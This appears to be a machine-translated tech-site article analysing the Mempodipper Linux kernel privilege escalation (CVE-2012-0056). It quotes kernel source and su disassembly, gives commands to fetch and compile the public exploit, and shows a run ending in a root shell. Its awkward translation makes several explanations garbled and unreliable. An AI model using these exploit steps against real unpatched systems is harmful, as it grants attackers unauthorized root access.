Shulou(Shulou.com)06/01 Report--

This article mainly introduces Linux local rights and EXP use of example analysis, the article is very detailed, has a certain reference value, interested friends must read!

Linux>=2.6.39 Mempodipper Native Titling Analysis and EXP Exploitation (CVE-2012-0056)

/proc/pid/mem is an interface for reading and writing process memory directly through a virtual memory space that seeks the same address as the process.

Impact Linux kernel> = 2.6.39

When/proc/pid/mem is opened, this kernel code is invoked:

The code is as follows:

static int mem_open(struct inode* inode, struct file* file)

{

file->private_data = (void*)((long)current->self_exec_id);

file->f_mode |= FMODE_UNSIGNED_OFFSET;

return 0;

}

Anyone can open/proc/pid/mem fd for any process to write to and read from, but there are permission-checking restrictions. Let's look at the writing function:

The code is as follows:

static ssize_t mem_write(struct file * file, const char __user *buf,

size_t count, loff_t *ppos)

{

struct task_struct *task = get_proc_task(file->f_path.dentry->d_inode);

mm = check_mem_permission(task);

copied = PTR_ERR(mm);

if (IS_ERR(mm))

goto out_free;

if (file->private_data != (void *)((long)current->self_exec_id))

goto out_mm;

There are two checks to prevent unauthorized write operations:

The code is as follows:

check_mem_permission and self_exec_id.

Check_mem_permission code simply calls__check_mem_permission, code:

static struct mm_struct *__check_mem_permission(struct task_struct *task)

{

struct mm_struct *mm;

mm = get_task_mm(task);

if (! mm)

return ERR_PTR(-EINVAL);

if (task == current)

return mm;

if (task_is_stopped_or_traced(task)) {

int match;

rcu_read_lock();

match = (ptrace_parent(task) == current);

rcu_read_unlock();

if (match && ptrace_may_access(task, PTRACE_MODE_ATTACH))

return mm;

}

mmput(mm);

return ERR_PTR(-EPERM);

}

There are two ways to write to memory.

The code is as follows:

$ su "hsmw fuck you"

Unknown id: hsmw fuck you

We can see the output of su's stderr "Unknown id:", we can open fd/proc/self/mem, to determine the location in memory, then dup2 stderr and mem fd, write su $shellcode to memory, get root.

task == current test, self_exec_id matches self_exec_id to detect fd open.

Self_exec_id is referenced in only a few places in the kernel.

void setup_new_exec(struct linux_binprm * bprm)

{

current->self_exec_id++;

flush_signal_handlers(current, 0);

flush_old_files(current->files);

}

EXPORT_SYMBOL(setup_new_exec);

We create a child process and use self_exec_id to exec into a new process. When we exec a new process, self_exec_id generates an increment. Here the program is busy writing su with executing to our shellcode, so its self_exec_id gets the same value incremented. So what we need to do is exec a new process, fd /proc/parent-pid/mem, to the PID of the parent process. FD at this time is because there is no permission to open only checks. When it is turned on, its self_exec_id comes into play, putting us exec to su, with self_exec_id will increment. Return to parent process from child process via FD we opened, dup2, and exec overflow code to su.

Next debug the overflow address and ASLR random process space address.

Get the error string here:

403677: ba 05 00 00 00 mov $0x5,%edx

40367c: be ff 64 40 00 mov $0x4064ff,%esi

403681: 31 ff xor %edi,%edi

403683: e8 e0 ed ff ff callq 402468 (dcgettext@plt)

Then write it to stderr:

403688: 48 8b 3d 59 51 20 00 mov 0x205159(%rip),%rdi # 6087e8 (stderr)

40368f: 48 89 c2 mov %rax,%rdx

403692: b9 20 88 60 00 mov $0x608820,%ecx

403697: be 01 00 00 00 mov $0x1,%esi

40369c: 31 c0 xor %eax,%eax

40369e: e8 75 ea ff ff callq 402118 (__fprintf_chk@plt)

Close the log;

4036a3: e8 f0 eb ff ff callq 402298 (closelog@plt)

Withdrawal from the procedure;

4036a8: bf 01 00 00 00 mov $0x1,%edi

4036ad: e8 c6 ea ff ff callq 402178 (exit@plt)

Here you can see 0×402178, which is where it calls exit. Let's debug the shellcode address of "Unknown id:".

$objdump -d /bin/su|grep ''|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\([^0]*\)/0x\1/' 0x402178

It sets uid and gid to 0 to execute a SHELL. You can also reopen dup2ing memory before stderr fd to stderr

We choose another fd dup stderr, at shellcode, to our dup2, the other fd back to stderr.

EXP is written by foreigners. insert a piece

The code is as follows:

wget http://git.zx2c4.com/CVE-2012-0056/tree/mempodipper.c

CVE-2012-0056 $ ls

build-and-run-exploit.sh build-and-run-shellcode.sh mempodipper.c shellcode-32.s shellcode-64.s

CVE-2012-0056 $ gcc mempodipper.c -o mempodipper

CVE-2012-0056 $ ./ mempodipper

===============================

= Mempodipper =

= by zx2c4 =

= Jan 21, 2012 =

===============================

[+] Waiting for transferred fd in parent.

[+] Executing child from child fork.

[+] Opening parent mem /proc/6454/mem in child.

[+] Sending fd 3 to parent.

[+] Received fd at 5.

[+] Assigning fd 5 to stderr.

[+] Reading su for exit@plt.

[+] Resolved exit@plt to 0x402178.

[+] Seeking to offset 0x40216c.

[+] Executing su with shellcode.

sh-4.2# whoami

root

sh-4.2#

The above is "Linux native rights and EXP utilization of sample analysis" all the content of this article, thank you for reading! Hope to share the content to help everyone, more relevant knowledge, welcome to pay attention to the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.